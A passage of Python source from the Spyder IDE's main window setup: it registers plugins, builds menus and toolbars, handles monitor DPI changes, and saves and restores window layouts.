for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"), "linguist")
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
for act in (qtdact, qtlact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
logger.info("Creating guidata and sift entries...")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see spyder-ide/spyder#2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except:
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except:
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_shortcut_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
# Internal console plugin
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
from spyder.plugins.console.plugin import Console
self.console = Console(self, configuration=CONF)
self.console.set_exit_function(self.closing)
self.register_plugin(self.console)
# TODO: Load and register the rest of the plugins using new API
# Run plugin
from spyder.plugins.run.plugin import Run
self.run = Run(self, configuration=CONF)
self.register_plugin(self.run)
# Appearance plugin
from spyder.plugins.appearance.plugin import Appearance
self.appearance = Appearance(self, configuration=CONF)
self.register_plugin(self.appearance)
# Code completion client initialization
self.set_splash(_("Starting code completion manager..."))
from spyder.plugins.completion.manager.plugin import CompletionManager
self.completions = CompletionManager(self)
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer.plugin import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
self.add_plugin(self.outlineexplorer)
if is_anaconda():
from spyder.widgets.status import CondaStatus
self.conda_status = CondaStatus(self, status,
icon=ima.icon('environment'))
self.conda_status.update_interpreter(self.get_main_interpreter())
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor.plugin import Editor
self.editor = Editor(self)
self.editor.register_plugin()
self.add_plugin(self.editor)
# Start code completion client
self.set_splash(_("Launching code completion client for Python..."))
self.completions.start()
self.completions.start_client(language='python')
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
file_actions = [
self.file_switcher_action,
self.symbol_finder_action,
None,
]
if sys.platform == 'darwin':
file_actions.extend(self.editor.tab_navigation_actions + [None])
file_actions.extend([restart_action, quit_action])
self.file_menu_actions += file_actions
self.set_splash("")
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer.plugin import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
self.add_plugin(self.variableexplorer)
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole.plugin import IPythonConsole
self.ipyconsole = IPythonConsole(self, css_path=css_path)
self.ipyconsole.register_plugin()
self.add_plugin(self.ipyconsole)
# Help plugin
# TODO: There is a circular dependency between help and ipython since
# ipython console uses css_path.
if CONF.get('help', 'enable'):
CONF.set('help', 'css_path', css_path)
from spyder.plugins.help.plugin import Help
self.help = Help(self, configuration=CONF)
self.register_plugin(self.help)
# History log widget
if CONF.get('historylog', 'enable'):
from spyder.plugins.history.plugin import HistoryLog
self.historylog = HistoryLog(self, configuration=CONF)
self.register_plugin(self.historylog)
# Figure browser
self.set_splash(_("Loading figure browser..."))
from spyder.plugins.plots.plugin import Plots
self.plots = Plots(self, configuration=CONF)
self.register_plugin(self.plots)
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer.plugin import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
self.add_plugin(self.explorer)
# Online help widget
if CONF.get('onlinehelp', 'enable'):
from spyder.plugins.onlinehelp.plugin import OnlineHelp
self.onlinehelp = OnlineHelp(self, configuration=CONF)
self.register_plugin(self.onlinehelp)
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects.plugin import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
self.add_plugin(self.projects)
# Working directory plugin
from spyder.plugins.workingdirectory.plugin import WorkingDirectory
CONF.set('workingdir', 'init_workdir', self.init_workdir)
self.workingdirectory = WorkingDirectory(self, configuration=CONF)
self.register_plugin(self.workingdirectory)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles.plugin import FindInFiles
self.findinfiles = FindInFiles(self, configuration=CONF)
self.register_plugin(self.findinfiles)
# Load other plugins (former external plugins)
# TODO: Use this bucle to load all internall plugins and remove
# duplicated code
# Breakpoints
if CONF.get('breakpoints', 'enable'):
from spyder.plugins.breakpoints.plugin import Breakpoints
self.breakpoints = Breakpoints(self, configuration=CONF)
self.register_plugin(self.breakpoints)
self.thirdparty_plugins.append(self.breakpoints)
# Profiler plugin
if CONF.get('profiler', 'enable'):
from spyder.plugins.profiler.plugin import Profiler
self.profiler = Profiler(self, configuration=CONF)
self.register_plugin(self.profiler)
self.thirdparty_plugins.append(self.profiler)
other_plugins = ['pylint']
for plugin_name in other_plugins:
if CONF.get(plugin_name, 'enable'):
module = importlib.import_module(
'spyder.plugins.{}'.format(plugin_name))
plugin = module.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
self.add_plugin(plugin)
# Third-party plugins
from spyder import dependencies
self.set_splash(_("Loading third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'COMPLETION_CLIENT_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# New API: Load and register external plugins
external_plugins = find_external_plugins()
plugin_deps = solve_plugin_dependencies(external_plugins.values())
for plugin_class in plugin_deps:
if issubclass(plugin_class, SpyderPluginV2):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Setting up main window..."))
# Help menu
trouble_action = create_action(self,
_("Troubleshooting..."),
triggered=self.trouble_guide)
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
spyder_doc = 'https://docs.spyder-ide.org/'
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(spyder_doc))
self.register_shortcut(doc_action, "_",
"spyder documentation")
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"), self)
self.tour_menu_actions = []
# TODO: Only show intro tour for now. When we are close to finish
# 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
self.help_menu_actions = [
doc_action,
tut_action,
# shortcuts_action,
self.tours_menu,
MENU_SEPARATOR,
trouble_action,
report_action, dep_action,
self.check_updates_action,
support_action,
MENU_SEPARATOR,
]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if not API == 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"), self)
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
webres_actions.insert(8, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.show_about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus, ClockStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.clock_status = ClockStatus(self, status)
self.apply_statusbar_settings()
# ----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_interface_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
logger.info("Setting up window...")
self.setup_layout(default=False)
if self.splash is not None:
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
self.tabify_plugin(plugin_instance)
plugin_instance.toggle_view(False)
def setup_menus(self):
"""Setup menus."""
# Update menus list
default_menus = [self.file_menu, self.edit_menu, self.search_menu,
self.source_menu, self.run_menu, self.debug_menu,
self.consoles_menu, self.projects_menu,
self.tools_menu, self.view_menu, self.help_menu]
self.menus = self.menus + default_menus
# Show and hide shortcuts and icons in menus for macOS
if sys.platform == 'darwin':
for menu in self.menus:
if menu is not None:
menu.aboutToShow.connect(
lambda menu=menu: self.show_shortcuts(menu))
menu.aboutToHide.connect(
lambda menu=menu: self.hide_shortcuts(menu))
menu.aboutToShow.connect(
lambda menu=menu: set_menu_icons(menu, False))
menu.aboutToShow.connect(self.hide_options_menus)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
regex = re.compile(r'.*_.*_(\d+)[.]log')
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for plugin_id, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# In MacOS X 10.7 our app is not displayed after initialized (I don't
# know why because this doesn't happen when started from the terminal),
# so we need to resort to this hack to make it appear.
if running_in_mac_app():
idx = __file__.index(MAC_APP_NAME)
app_path = __file__[:idx]
subprocess.call(['open', app_path + MAC_APP_NAME])
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emmited by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status
self.toggle_lock(self.interface_locked)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
if self.open_project:
self.projects.open_project(self.open_project)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor to Kite completions plugin status
self.editor.kite_completions_file_status()
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Setup menus
self.setup_menus()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates(startup=True)
# Show dialog with missing dependencies
if not running_under_pytest():
self.report_missing_dependencies()
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
self.screen = self.window().windowHandle().screen()
self.current_dpi = self.screen.logicalDotsPerInch()
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, screen):
"""Connect DPI signals for new screen."""
try:
self.screen.logicalDotsPerInchChanged.disconnect(
self.show_dpi_change_message)
except (TypeError, RuntimeError):
# See spyder-ide/spyder#11903 and spyder-ide/spyder#11997
pass
self.screen = screen
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
if self.current_dpi != screen.logicalDotsPerInch():
self.show_dpi_change_message(screen.logicalDotsPerInch())
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
self.screen.logicalDotsPerInchChanged.disconnect(
self.show_dpi_change_message)
if self.current_dpi == dpi:
# Reconnect DPI scale changes to show a restart message
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
return
if not self.show_dpi_message:
return
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
dismiss_box = QCheckBox(
_("Hide this message during the current session")
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(
_("A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > General > Interface</tt>, "
"in case Spyder is not displayed correctly.<br><br>"
"Do you want to restart Spyder?"))
restart_button = msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.exec_()
if dismiss_box.isChecked():
self.show_dpi_message = False
if msgbox.clickedButton() == restart_button:
# Activate HDPI auto-scaling option since is needed for a proper
# display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Reconnect DPI scale changes to show a restart message
# also update current dpi for future checks
self.current_dpi = dpi
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
# Declare dependencies before trying to detect the missing ones
dependencies.declare_dependencies()
missing_deps = dependencies.missing_dependencies()
if missing_deps:
# We change '<br>' by '\n', in order to replace the '<'
# that appear in our deps by '<' (to not break html
# formatting) and finally we restore '<br>' again.
missing_deps = (missing_deps.replace('<br>', '\n').
replace('<', '<').replace('\n', '<br>'))
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See spyder-ide/spyder#3748.
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""Set window settings
Symetric to the 'get_window_settings' accessor"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
self.restoreState( QByteArray().fromHex(
str(hexstate).encode('utf-8')) )
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState()
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name, in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
# Old API
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
plugin._initialize_plugin_in_mainwindow_layout()
except AttributeError:
pass
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time."""
self.setUpdatesEnabled(False)
first_spyder_run = bool(self.first_spyder_run) # Store copy
if first_spyder_run:
self.set_window_settings(*settings)
else:
if self.last_plugin:
if self.last_plugin._ismaximized:
self.maximize_dockwidget(restore=True)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
min_width = self.minimumWidth()
max_width = self.maximumWidth()
base_width = self.width()
self.setFixedWidth(base_width)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
# Define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
plots = self.plots
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
# Stored for tests
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# --------------------------------------------------------------------
# Layouts are organized by columns, each column is organized by rows.
# Widths have to accumulate to 100 (except if hidden), height per
# column has to accumulate to 100 as well
# Spyder Default Initial Layout
s_layout = {
'widgets': [
# Column 0
[[explorer_project]],
# Column 1
[[editor]],
# Column 2
[[outline]],
# Column 3
[[help_plugin, explorer_variable, plots, # Row 0
helper, explorer_file, finder] + plugins,
[console_int, console_ipy, history]] # Row 1
],
'width fraction': [15, # Column 0 width
45, # Column 1 width
5, # Column 2 width
45], # Column 3 width
'height fraction': [[100], # Column 0, row heights
[100], # Column 1, row heights
[100], # Column 2, row heights
